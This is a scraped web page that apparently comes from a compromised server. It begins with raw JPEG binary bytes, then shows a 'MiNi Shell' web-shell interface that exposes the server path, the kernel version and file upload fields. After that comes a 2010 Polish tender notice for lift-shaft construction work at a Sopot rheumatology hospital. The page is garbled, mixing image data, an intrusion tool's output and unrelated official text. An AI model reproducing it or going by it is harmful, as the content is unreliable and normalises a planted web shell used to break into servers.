JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100625/183944-N-2010.html

<p class="kh_header"><b>Sopot: Roboty budowlane obejmujące demontaż dźwigu osobowego i rozbudowę szybu dla zamontowania nowego dźwigu osobowego dostosowanego do potrzeb osób niepełnosprawnych - w Pawilonie I, obiekcie samodzielnego publicznego zakładu opieki zdrowotnej Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz - Kosko w Sopocie, zlokalizowanym przy ul. Grunwaldzkiej 5</b><br>
<b>Numer ogłoszenia: 183944 - 2010; data zamieszczenia: 25.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zespół Reumatologiczny im. dr Jadwigi Titz-Kosko , ul. Grunwaldzka 1-3, 81-759 Sopot, woj. pomorskie, tel. 058 5557528.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzr.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane obejmujące demontaż dźwigu osobowego i rozbudowę szybu dla zamontowania nowego dźwigu osobowego dostosowanego do potrzeb osób niepełnosprawnych - w Pawilonie I, obiekcie samodzielnego publicznego zakładu opieki zdrowotnej Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz - Kosko w Sopocie, zlokalizowanym przy ul. Grunwaldzkiej 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1	Przedmiotem niniejszego postępowania są roboty budowlane obejmujące demontaż dźwigu osobowego i rozbudowę szybu dla zamontowania nowego dźwigu osobowego dostosowanego do potrzeb osób niepełnosprawnych - w Pawilonie I, obiekcie samodzielnego publicznego zakładu opieki zdrowotnej Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz - Kosko w Sopocie, zlokalizowanym przy ul. Grunwaldzkiej 5. Zamówienie nie obejmuje dostawy i montażu nowego dźwigu.
Zakres robót obejmuje modernizację istniejącego dźwigu osobowego, polegającą na:
- usunięciu obecnych urządzeń dźwigowych murowanego szybu wewnętrznego, 
- otwarciu od zewnątrz przestrzeni szybu i powiększenie jej przez dobudowanie wysuniętej części w celu utworzenia większego szybu mieszczącego kabinę o wymiarach 130 cm x 240 cm i zespół napędowy,
- wykonanie dla nowego dźwigu zasilania w energię elektryczną z instalacji Zamawiającego i wyposażenie w łączność telefoniczną z punktami dyżurnymi Zamawiającego,
- doprowadzeniu lica zewnętrznego ściany szczytowej do właściwego stanu techniczno - budowlanego po przebudowie szybu.
1.2 Pawilon I jest budynkiem o 3 kondygnacjach (parter, I piętro, II piętro + częściowo użytkowane poddasze), o bryle prostej zamkniętej w formie prostopadłościanu i dachem dwuspadowym, rzucie korytarzowym dwutraktowym z dwoma skrajnymi klatkami schodowymi i dźwigiem osobowym na zamknięciu korytarza. Budynek murowany z cegły ceramicznej, dach drewniany kryty papą bitumiczną; użytkowany jest jako oddział szpitalny. Obiekt podlega ochronie konserwatorskiej. 
Dźwig osobowy zlokalizowany jest na końcu korytarza przy południowej ścianie szczytowej w szybie o wymiarach: szer. 170 cm, gł. 125 cm i wys. 1090 cm. Maszynownia górna znajduje się na poddaszu użytkowym, poniżej podłogi parteru (przystanku 1) usytuowany jest blok fundamentowy dźwigu z podszybiem o głęb. 150 cm.
1.3 Typ dźwigu istniejącego: E 1003 - 100, rok produkcji 1993.
       Powiększenie obecnego szybu nastąpić ma poprzez usunięcie wewnętrznej, murowanej ściany czołowej, wewnętrznego szybu murowanego oddylatowanego od ścian korytarzowych oraz pionowego pasa ściany szczytowej i dobudowanie od zewnątrz żelbetowego półszybu na planie prostokątnej litery C połączonego ściśle ze ścianami istniejącymi na całej wysokości (13,65 m), o konstrukcji prostej wolnej od bez załomów i przeszkleń.
       Wymiary szybu: szer. wewn. - 1950 mm, głęb. wewn. pozioma - 2850 mm, głęb. pionowa podszybia - 1400 mm, wys. nadszybia - 4000 mm, łączna wys. szybu bez podszybia - 13710 mm, powierzchnia wewn. szybu - 1,95 x 2,85 m = 5,55 m2.
1.4 Nowy szyb dźwigowy musi odpowiadać wymaganym przepisom, w tym warunkom określonym w § 54 i § 193 - 202 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (D.z U. z 2002 r., Nr 75, poz. 690 z późn. zm.), normie EN 81 - 70 i przepisom ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (Dz. U. z 2000 r., Nr 122, poz. 1321 z późn. zm).
1.5 Zamówienie nie obejmuje dostawy dźwigu ani jego zainstalowania.
1.6 Wykonawca winien współpracować przy wykonywaniu umowy z dostawcą dźwigu celem należytego zrealizowania całości inwestycji.

2.	Przedmiot zamówienia w ujęciu całościowym określa dokumentacja składająca się z: 
- Projektu budowlanego z listopada 2009 r. autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku - stanowiącego załącznik Nr 7 do niniejszej SIWZ,
- Orzeczenia technicznego z listopada 2009 r. dot. istniejącego stanu technicznego budynku zlokalizowanego w Sopocie przy ul. Grunwaldzkiej 5 autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku - stanowiącego załącznik Nr 8 do niniejszej SIWZ,
- Ogólna specyfikacja techniczna OST.01.00. autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku - stanowiąca załącznik Nr 9 do niniejszej SIWZ,,
- Szczegółowa specyfikacja techniczna wykonania i odbioru SST.01.01. Robót ziemnych i przygotowawczych autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku - stanowiąca załącznik Nr 10 do niniejszej SIWZ,  
- Szczegółowa specyfikacja techniczna wykonania i odbioru SST.01.02. roboty rozbiórkowe i przygotowawcze autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku - stanowiąca załącznik Nr 11 do niniejszej SIWZ,
- Szczegółowa specyfikacja techniczna wykonania i odbioru robót SST.01.03. roboty żelbetowe autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku - stanowiąca załącznik Nr 12 do niniejszej SIWZ,,
- Szczegółowa specyfikacja techniczna wykonania i odbioru robót SST.01.04. w zakresie obiektu budowlanego - stan wykończeniowy autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku - stanowiąca załącznik Nr 13 do niniejszej SIWZ,
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - branża elektryczna autorstwa Biura Architektonicznego MAT Sp. z o.o. z siedzibą w Gdańsku wraz z CES Sp. z o.o. z siedzibą Gdańsk - stanowiąca załącznik Nr 14 do niniejszej SIWZ, 
- Przedmiar robót z listopada 2009 r. - stanowiącego załącznik Nr 15 do niniejszej SIWZ.
- Kosztorys przedmiarowy branża instalacje elektryczne z listopada 2009 r. - stanowiący załącznik Nr 16 do niniejszej SIWZ.
- Kosztorysu nakładczego (ślepego) z listopada 2009 r. - stanowiącego załącznik Nr 17 do niniejszej SIWZ,

Dokumentacja dostępna jest również w formie elektronicznej na stronie internetowej Zamawiającego: www.wzr.com.pl

3.	Zamawiający udostępni oferentom przeprowadzenie wizji lokalnej obiektu, w którym będą wykonywane roboty budowlane oraz wizji lokalnej przyległego terenu dla oceny warunków dojazdów i dojść oraz możliwości zastosowania sprzętu związanego z wykonywaniem robót, po uprzednim uzgodnieniu telefonicznym z przedstawicielem Zamawiającego - Panem inż. Marianem Olbromskim tel. 691-788-606 lub Panem mgr inż. Zbigniewem Kunikowskim pod nr telefonu (0-58) 555-75-23.

4.	Zamawiający wymaga udzielenia minimum 36 miesięcy gwarancji na wykonane roboty.

5.	Wykonawca zobowiązany jest do organizacji warunków realizacyjnych robót zgodnie z przepisami budowlanymi, bhp i ppoż. Wykonawca będzie zobowiązany do realizacji robót budowlanych w taki sposób, aby nie zakłócać funkcjonowania pracy Zamawiającego. Prace objęte są Pozwoleniem na budowę wydanym przez Prezydenta Miasta Sopotu nr UA-III/7353/651/09 z dnia 21.12.2009 r. oraz Decyzją Konserwatora Zabytków Miasta Sopotu nr KZ-40450/246/2009 z dnia 06.11.2009 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających (art. 67 ust. 1 pkt 7 ustawy Prawo zamówień publicznych) do 30% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.12.20.00-8, 45.11.30.00-2, 45.11.23.60-6, 45.20.00.00-9, 45.26.27.00-8, 45.26.28.00-9, 45.40.00.00-1, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.44.21.10-1, 45.30.00.00-0, 45.31.11.00-1, 45.31.53.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wniesienie wadium - jest wymagane.
Wysokość wadium dla całości zamówienia wynosi 6.340,00 zł (słownie: sześć tysięcy trzysta czterdzieści PLN, 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W razie złożenia przez Wykonawcę oświadczenia o spełnianiu wskazanego warunku Zamawiający uzna warunek za spełniony</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W razie złożenia przez Wykonawcę oświadczenia o spełnianiu wskazanego warunku oraz wykazu wykonanych (tj. rozpoczętych i zakończonych) przez Wykonawcę w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - to w tym okresie - minimum 2 robót budowlanych zawierających w swym zakresie budowę lub rozbudowę szybu dźwigu osobowego o wartości jednostkowej minimum 250.000,00 zł brutto każda według wzoru stanowiącego Załącznik nr 4 do SIWZ, oraz załączenia dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, Zamawiający uzna warunek za spełniony.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W razie złożenia przez Wykonawcę oświadczenia o spełnianiu wskazanego warunku w oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, wykazującego kierownika robót w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz kierownika prac instalacyjnych o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych bez ograniczeń, a także zakres wykonywanych przez nich czynności oraz z informacją o podstawie do dysponowania tymi osobami - według wzoru stanowiącego Załącznik nr 5 do SIWZ oraz oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych bez ograniczeń, Zamawiający uzna warunek za spełniony.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w pkt. III.3.3)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W razie złożenia przez Wykonawcę oświadczenia o spełnianiu wskazanego warunku oraz opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości minimum 250.000,00 zł - Zamawiający uzna warunek za spełniony.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- kosztorys ofertowy w postaci wypełnionego, wyliczonego i podpisanego przez Wykonawcę kosztorysu nakładczego - stanowiącego załącznik nr 10 do SIWZ, (UWAGA: należy wypełnić kosztorys nakładczy z wyłączeniem pozycji nr 83 tj. dźwig osobowy indywidualny - projekt, wykonanie, dostawa, montaż, odbiory techniczne)
- dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalne pod rygorem nieważności są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że nastąpią następujące warunki zmiany umowy:
- w przypadku uniemożliwienia rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu, a także opóźnienia prac - z przyczyn nie leżących po stronie Wykonawcy, ostateczny termin wykonania umowy może ulec przesunięciu o okres wynikający z zaistniałych okoliczności. O każdej takiej sytuacji Wykonawca winien niezwłocznie zawiadomić Zamawiającego, wraz z podaniem przyczyn przerwy i opóźnienia, który w razie uznania występowania przesłanek do przesunięcia terminu wykonania prac, może podpisać aneks przedłużający ostateczny termin wykonania, 
- nastąpi zmiana materiałów lub urządzeń przewidzianych w dokumentacji projektowej lub ofercie przetargowej Wykonawcy, wynikająca z zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy, jeżeli zmiana ta nie doprowadzi do obniżenia standardu robót budowlanych będących przedmiotem zamówienia;
- wystąpią zmiany w nazwach lub adresach stron, zmiany związane z przekształceniem podmiotowym stron;
- zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy;
- nastąpi zmiana obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem,
- zaistnieje siła wyższa uniemożliwiająca okresowe wykonywanie przedmiotu umowy,
- wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzr.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1-3
81-759 Sopot
Dział Zamówień Publicznych, I piętro, pok. nr 7B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2010 godzina 10:00, miejsce: Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1-3
81-759 Sopot
Sekretariat, II piętro, pok. nr 7B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje administracyjne : 
- numer referencyjny nadany sprawie przez podmiot zamawiający : N/11/10
- brak poprzednich publikacji dotyczących tego samego ogłoszenia
